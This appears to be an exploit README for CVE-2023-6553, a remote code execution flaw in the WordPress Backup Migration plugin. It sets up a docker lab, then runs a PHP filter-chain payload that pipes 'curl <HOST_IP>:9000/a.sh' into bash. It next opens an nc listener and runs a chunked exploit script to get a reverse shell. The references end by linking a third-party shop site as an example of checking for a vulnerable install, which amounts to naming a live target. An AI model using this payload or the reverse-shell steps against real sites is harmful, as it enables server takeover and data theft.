Share
## https://sploitus.com/exploit?id=E4255C6C-135B-52C2-A15A-80F5F4A7EA47
# CVE-2023-6553
Exploit Development for CVE-2023-6553 on Backup Plugin in Wordpress

This is a critical CVE with a CVSS score of 9.8

The vulnerability allows attacker to send commands to the server running the vulnerable version of the plugin

Vulnerable Version
Backup <= 1.3.7

## Set up

1) git clone the repository

2) Run the command below to set up the docker containers 
```
docker-compose up -d
```
You should see 2 docker containers
- Wordpress
- SQL

3) Now you can navigate to the wordpress site on the ip of the docker container and can also be accessed at
```
http://localhost:8000/
```

4) To install the vulnerable backup plugin run the following command
```
wget https://downloads.wordpress.org/plugin/backup-backup.1.3.6.zip
```

5) Now login to the wordpress website using the link in step3 and install backup plugin after downloading it from the command above

## Exploitation

1) Start a listener on port 9000 to got at callbacks when we run the exploit.
```
python3 -m http.server
```

2) Run the go script using the following command a
```
go run exploit.go -chain="<?php exec('curl <HOST_IP>:9000/a.sh |bash');?>"
```

3) You will get the following error
```
HTTP Response Body:  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.</p>
<hr>
<address>Apache/2.4.62 (Debian) Server at 172.18.0.3 Port 80</address>
</body></html>
```

This is because the after the filter conversions that size of the header exceeds what the server allows.

4) So now we break our command into chunks, write that to a file on the remote server and then execute it, but before that we have to start listening to get a reverse shell
```
nc -nlvp 8080
```
and now run the command to exploit the vulnerable plugin

```
python3 final_exploit.py
```

5) You should have a reverse shell at this point


## References
- https://patchstack.com/articles/test-wordpress-plugin-security/
- https://patchstack.com/whitepaper/the-state-of-wordpress-security-in-2021/
- https://wordpress.org/plugins/backup-backup/
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup-backup/backup-migration-137-unauthenticated-remote-code-execution
- https://plugins.trac.wordpress.org/browser/backup-backup/โ€‹
- https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py โ€‹
- https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it โ€‹
- How easy it is to check if vulnerable version of wordpress is present: https://www.thetraveloutlier.com/shop/โ€‹